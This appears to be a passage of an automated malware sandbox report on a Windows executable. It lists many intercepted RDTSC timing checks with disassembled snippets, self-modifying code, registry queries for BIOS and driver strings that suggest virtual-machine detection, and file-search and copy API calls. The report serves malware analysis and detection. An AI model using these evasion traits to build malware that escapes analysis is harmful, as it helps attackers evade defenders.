                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0AC7 second address: CD0ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C712DB second address: C712E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A0BB second address: D0A0C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A0C1 second address: D0A0D6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6398F5B496h 0x00000008 js 00007F6398F5B496h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08AB4 second address: D08ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08ABA second address: D08AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08C17 second address: D08C1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08C1B second address: D08C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6398F5B4A7h 0x0000000c jmp 00007F6398F5B4A1h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0D2B0 second address: D0D2B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0D2B5 second address: D0D2C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6398F5B496h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0D2C4 second address: D0D2C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0CB24 second address: D0CB61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6398F5B4A7h 0x00000009 pop ebx 0x0000000a push edi 0x0000000b jmp 00007F6398F5B49Eh 0x00000010 jmp 00007F6398F5B4A1h 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0CB61 second address: D0CB66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0CB66 second address: D0CB6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0CCFA second address: D0CCFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0CCFE second address: D0CD04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10849 second address: D1084F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1084F second address: D10857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10A06 second address: D10A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10A0B second address: D10A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10A13 second address: D10A17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10A17 second address: D10A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10D27 second address: D10D67 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6398F5EC96h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F6398F5ECA8h 0x00000011 push esi 0x00000012 jnc 00007F6398F5EC96h 0x00000018 pop esi 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007F6398F5EC9Eh 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10D67 second address: D10D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10F6F second address: D10F73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10F73 second address: D10F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6398F5B49Fh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10F8A second address: D10F90 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10F90 second address: D10F96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10F96 second address: D10F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10F9C second address: D10FC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5B4A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6398F5B49Bh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19543 second address: D1958D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6398F5EC9Dh 0x00000009 pop edi 0x0000000a jmp 00007F6398F5ECA4h 0x0000000f jmp 00007F6398F5ECA8h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jnl 00007F6398F5EC96h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1958D second address: D1959E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F6398F5B49Ah 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1959E second address: D195CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6398F5ECA5h 0x00000009 jmp 00007F6398F5ECA7h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D180C2 second address: D180E7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6398F5B49Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007F6398F5B496h 0x00000010 push eax 0x00000011 jmp 00007F6398F5B4A2h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D180E7 second address: D18103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jns 00007F6398F5EC9Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18472 second address: D18491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6398F5B4A9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18491 second address: D1849C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1849C second address: D184A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18F1A second address: D18F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2023E second address: D20242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20242 second address: D20248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20248 second address: D2024E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2024E second address: D2026F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5EC9Dh 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007F6398F5EC96h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2026F second address: D20289 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F6398F5B49Ah 0x00000010 push esi 0x00000011 pop esi 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20289 second address: D2028F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2028F second address: D20293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20293 second address: D202AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5ECA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D202AE second address: D202B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D202B2 second address: D202B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D234A9 second address: D234AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D234AD second address: D234B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D234B1 second address: D234C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F6398F5B496h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D234C1 second address: D234D9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6398F5EC96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jnl 00007F6398F5EC96h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D234D9 second address: D234E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23627 second address: D23631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6398F5EC96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23BAC second address: D23BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6398F5B496h 0x0000000a jmp 00007F6398F5B4A0h 0x0000000f popad 0x00000010 push edi 0x00000011 push edi 0x00000012 pop edi 0x00000013 jne 00007F6398F5B496h 0x00000019 pop edi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23D3A second address: D23D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23D40 second address: D23D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23EB2 second address: D23EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F6398F5EC9Bh 0x0000000b jmp 00007F6398F5ECA6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23EDC second address: D23EE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23EE4 second address: D23EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23EE8 second address: D23EFC instructions: 0x00000000 rdtsc 0x00000002 je 00007F6398F5B496h 0x00000008 jbe 00007F6398F5B496h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23EFC second address: D23F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AE3A second address: D2AE3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B4AC second address: D2B4B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B4B2 second address: D2B4BC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6398F5B4A2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B4BC second address: D2B4E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6398F5EC96h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6398F5ECA8h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B616 second address: D2B61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B61A second address: D2B624 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6398F5EC96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B624 second address: D2B632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F6398F5B49Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C399 second address: D2C3B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5ECA1h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C3B0 second address: D2C3B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C3B6 second address: D2C3BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C3BC second address: D2C3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C3C0 second address: D2C3C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C3C4 second address: D2C3CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C3CE second address: D2C3D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C3D2 second address: D2C3D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2CA80 second address: D2CA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2CA84 second address: D2CAAA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F6398F5B4A5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e jns 00007F6398F5B496h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2CAAA second address: D2CAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F6398F5ECA7h 0x0000000c jns 00007F6398F5EC98h 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D33384 second address: D33389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D33389 second address: D33399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6398F5EC9Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D427F8 second address: D42813 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6398F5B496h 0x00000008 jmp 00007F6398F5B4A1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42813 second address: D4282B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6398F5ECA3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4282B second address: D42837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6398F5B496h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42837 second address: D42842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42842 second address: D42846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46A90 second address: D46A98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46A98 second address: D46AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6398F5B49Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4CC57 second address: D4CC66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6398F5EC96h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4CC66 second address: D4CC6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4CC6A second address: D4CC6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D9B4 second address: D5D9D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F6398F5B4A1h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D9D1 second address: D5D9EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6398F5ECA9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D9EF second address: D5D9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D9F5 second address: D5D9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C3AB second address: D5C3B6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007F6398F5B496h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: B1192F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: B119A7 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: CABD64 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: CAA788 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: CBE80E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: D38567 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008BDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
